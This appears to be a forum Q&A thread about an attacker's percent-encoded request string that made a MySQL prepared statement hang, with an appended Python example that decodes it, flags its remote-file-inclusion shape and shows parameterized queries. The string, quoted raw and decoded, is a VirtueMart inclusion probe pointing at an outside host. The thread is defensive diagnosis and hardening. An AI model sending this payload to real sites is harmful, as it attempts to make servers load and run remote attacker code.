views: 89
answers: 2
I recently had an attack on my site and the attacker tried to alter one of my SQL statements by adding the following string

%2f%2fcomponents%2fcom%5fvirtuemart%2fshow%5fimage%5fin%5fimgtag%2ephp%3fmosConfig%5fabsolute%5fpath%3dhttp%3a%2f%2fwww%2ekwangsung%2ees%2ekr%2f%2fUserFiles%2fshirohige%2fzfxid%2etxt

to a value.

Anyways, I don't use PHP or whatever this happened to be, but the %3f%3f caused a problem: in the MySQL prepare statement call, the double ?s hang.

Has anyone else run into this issue with double ?s before? I checked the MySQL site and didn't find anything.

+1  A: 

This isn't a SQL injection attack, it appears to be a probe to see if you were vulnerable to some sort of "virtuemart" vulnerability.

//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt

Regardless of what language you use, you shouldn't be passing arbitrary GET data to your SQL queries. You need to implement some type of server side validation, as well as ensure your queries properly escape all user defined input.

hobodave
A: 

Sorry, I posted this question on another browser elsewhere using an unregistered account.

I did forget a %3f%3f at the end of the string I included.

No it's not an injection attack, it's some attack on some PHP program which I don't use, but the attacker tried anyways.

I am using C++ bindings to MySQL, way down in the stack. The prepare statement hangs with "??". I can verify this with other queries, not just the one I got via the attack.

I am taking in inputs and putting them in the query, but my platform automatically escapes <>&"' characters for all CGI inputs, and I am doing additional checks elsewhere for injection. This is actually legacy code. The newer version of the platform only allows parameterized SQL, and only via an RPC to the database, so you can only access certain tables and rows exposed by the RPC. So technically I won't have this problem anymore, but I am still curious why the "??" seems to hang.

Thanks.

OverClocked
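The following is an added example, not code from either poster. It takes the probe string from the question (with the trailing `%3f%3f` the asker said was missing), decodes it so it can be read and logged, flags its shape with a simple heuristic that is my own assumption rather than anything from the thread, and then contrasts the two ways the value can reach a prepared statement: pasted into the SQL text before `prepare` (where any `?` that lands outside a quoted literal is read as a parameter marker) versus passed as a bound parameter (where `?` in the data is inert). Python's `sqlite3` stands in for the MySQL C++ bindings; both use `?` as the marker, and the marker-counting check is a pre-prepare guard for the legacy code path, not a MySQL feature.

```python
import sqlite3
from urllib.parse import unquote

# Constructed sample input: the percent-encoded string quoted in the question,
# with the trailing "%3f%3f" the asker later said he had left off.
PROBE = (
    "%2f%2fcomponents%2fcom%5fvirtuemart%2fshow%5fimage%5fin%5fimgtag%2ephp"
    "%3fmosConfig%5fabsolute%5fpath%3dhttp%3a%2f%2fwww%2ekwangsung%2ees%2ekr"
    "%2f%2fUserFiles%2fshirohige%2fzfxid%2etxt%3f%3f"
)


def decode_probe(encoded: str) -> str:
    """Percent-decode the raw request value so it can be read and logged."""
    return unquote(encoded)


def looks_like_rfi_probe(decoded: str) -> bool:
    """Heuristic (my assumption, not from the thread): a path to a .php script whose
    query string hands it a remote URL has the shape of a remote-file-inclusion probe."""
    path, sep, query = decoded.partition("?")
    return sep == "?" and path.lower().endswith(".php") and "://" in query


def count_markers(sql: str) -> int:
    """Count '?' characters a driver reads as parameter markers: those outside
    single-quoted string literals (a doubled '' inside a literal toggles twice)."""
    count = 0
    in_string = False
    for ch in sql:
        if ch == "'":
            in_string = not in_string
        elif ch == "?" and not in_string:
            count += 1
    return count


def bindings_match(sql: str, params_to_bind: int) -> bool:
    """Guard for the legacy path: refuse to prepare text whose marker count no
    longer matches the number of values the caller intends to bind."""
    return count_markers(sql) == params_to_bind


def build_legacy_sql(value: str) -> str:
    """Legacy pattern from the thread: escape, then paste the text into the
    statement before it is prepared. Quote escaping here is '' doubling."""
    escaped = value.replace("'", "''")
    return "INSERT INTO hits (value) VALUES ('" + escaped + "')"


def new_db() -> sqlite3.Connection:
    """In-memory table standing in for whatever the CGI handler writes to."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE hits (id INTEGER PRIMARY KEY, value TEXT)")
    return conn


def insert_parameterized(conn: sqlite3.Connection, value: str) -> str:
    """Hardened pattern: the statement text is fixed and the value travels as a
    bound parameter, so '?' characters in the data are never parsed as markers.
    Returns the stored value read back, which should equal the input verbatim."""
    conn.execute("INSERT INTO hits (value) VALUES (?)", (value,))
    row = conn.execute("SELECT value FROM hits ORDER BY id DESC LIMIT 1").fetchone()
    return row[0]


if __name__ == "__main__":
    decoded = decode_probe(PROBE)
    print("decoded:", decoded)
    print("RFI-probe shape:", looks_like_rfi_probe(decoded))
    legacy = build_legacy_sql(decoded)
    print("markers with value inside quotes:", count_markers(legacy))
    print("markers with value pasted unquoted:",
          count_markers("SELECT 1 WHERE x = " + decoded))
    print("safe to prepare legacy text with 0 bindings:", bindings_match(legacy, 0))
    conn = new_db()
    print("stored verbatim via parameter:", insert_parameterized(conn, decoded) == decoded)
```

The marker count is the thing to watch on the legacy path: as long as the escaped value really ends up inside a quoted literal, the `??` is just text to the parser, but the moment it lands outside quotes (a numeric column, a broken escape, a second layer of decoding) those question marks become parameter markers the caller never binds, and the prepare/execute pair stops behaving as intended. The parameterized form sidesteps the question entirely, which is why the newer platform's RPC-only, parameterized-only design is the right fix.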